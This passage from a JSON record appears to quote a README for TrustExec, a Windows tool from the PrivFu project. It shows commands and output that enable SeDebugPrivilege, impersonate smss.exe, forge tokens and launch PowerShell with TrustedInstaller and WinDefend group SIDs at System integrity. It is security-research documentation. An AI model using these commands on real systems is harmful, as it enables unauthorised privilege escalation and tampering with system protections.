Enabled\nSeTrustedCredManAccessPrivilege           Access Credential Manager as a 
trusted caller                      Enabled\nSeRelabelPrivilege                        Modify an object label                                             Enabled\nSeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled\nSeTimeZonePrivilege                       Change the time zone                                               Enabled\nSeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled\nSeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled\nPS C:\\Dev\u003e whoami /groups\n\nGROUP INFORMATION\n-----------------\n\nGroup Name                             Type             SID                                                            Attributes\n====================================== ================ ============================================================== ==================================================\nEveryone                               Well-known group S-1-1-0                                                        Mandatory group, Enabled by default, Enabled group\nLOCAL                                  Well-known group S-1-2-0                                                        Mandatory group, Enabled by default, Enabled group\nCONSOLE LOGON                          Well-known group S-1-2-1                                                        Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\SERVICE                   Well-known group S-1-5-6                                                        Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Authenticated Users       Well-known group S-1-5-11                                                       Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Administrators                 Alias            S-1-5-32-544                                                   Enabled by 
default, Enabled group, Group owner\nBUILTIN\\Users                          Alias            S-1-5-32-545                                                   Mandatory group, Enabled by default, Enabled group\nNT SERVICE\\TrustedInstaller            Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner\nMandatory Label\\System Mandatory Level Label            S-1-16-16384\n```\n\nIf you want to create the process with a new console, set the `-n` flag as follows:\n\n```\nPS C:\\Dev\u003e .\\TrustExec.exe -m 1 -x -c powershell -n\n\n[*] Virtual logon method is selected.\n[+] SeDebugPrivilege is enabled successfully.\n[+] SeImpersonatePrivilege is enabled successfully.\n[+] Impersonation as smss.exe is successful.\n[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.\n[+] SeImpersonatePrivilege is enabled successfully for current thread.\n[+] SeTcbPrivilege is enabled successfully for current thread.\n[+] A virtual domain VirtualDomain is created successfully (SID: S-1-5-110).\n[+] A virtual account VirtualDomain\\VirtualAdmin is created successfully (SID: S-1-5-110-500).\n[+] Got a virtual logon token (Handle = 0xEC).\n[+] Got a token assigned process (PID: 23836).\n[+] VirtualDomain domain is removed successfully.\n```\n\nEach method other than the TrustedInstaller service method (ID `4` for the `-m` option) accepts extra group SIDs via the `-e` option.\nThe value for the `-e` option must be an SDDL SID string.\nUse a comma as the separator between SID strings, as follows:\n\n```\nPS C:\\Dev\u003e .\\TrustExec.exe -m 0 -x -c powershell -e S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736,S-1-5-32-551\n\n[*] NtCreateToken syscall method is selected.\n[+] SeDebugPrivilege is enabled successfully.\n[+] SeImpersonatePrivilege is enabled successfully.\n[+] Impersonation as smss.exe is successful.\n[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.\n[+] 
SeCreateTokenPrivilege is enabled successfully for current thread.\n[+] SeImpersonatePrivilege is enabled successfully for current thread.\n[+] Got a TrustedInstaller token (Handle = 0x30C).\n[+] Got a token assigned process (PID: 17500).\nWindows PowerShell\nCopyright (C) Microsoft Corporation. All rights reserved.\n\nInstall the latest PowerShell for new features and improvements! https://aka.ms/PSWindows\n\nPS C:\\Dev\u003e whoami /user\n\nGROUP INFORMATION\n-----------------\n\nGroup Name                             Type             SID                                                             Attributes\n====================================== ================ =============================================================== ==================================================\nEveryone                               Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group\nLOCAL                                  Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group\nCONSOLE LOGON                          Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\SERVICE                   Well-known group S-1-5-6                                                         Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Authenticated Users       Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Backup Operators               Alias            S-1-5-32-551                                                    Enabled by default, Enabled group\nBUILTIN\\Administrators                 Alias            S-1-5-32-544                                                    Enabled by default, Enabled group, Group owner\nBUILTIN\\Users        
                  Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group\nNT SERVICE\\TrustedInstaller            Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464  Enabled by default, Enabled group, Group owner\nMandatory Label\\System Mandatory Level Label            S-1-16-16384                                                    \nNT SERVICE\\WinDefend                   Well-known group S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736 Ena","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdaem0nc0re%2FPrivFu","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdaem0nc0re%2FPrivFu","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdaem0nc0re%2FPrivFu/lists"}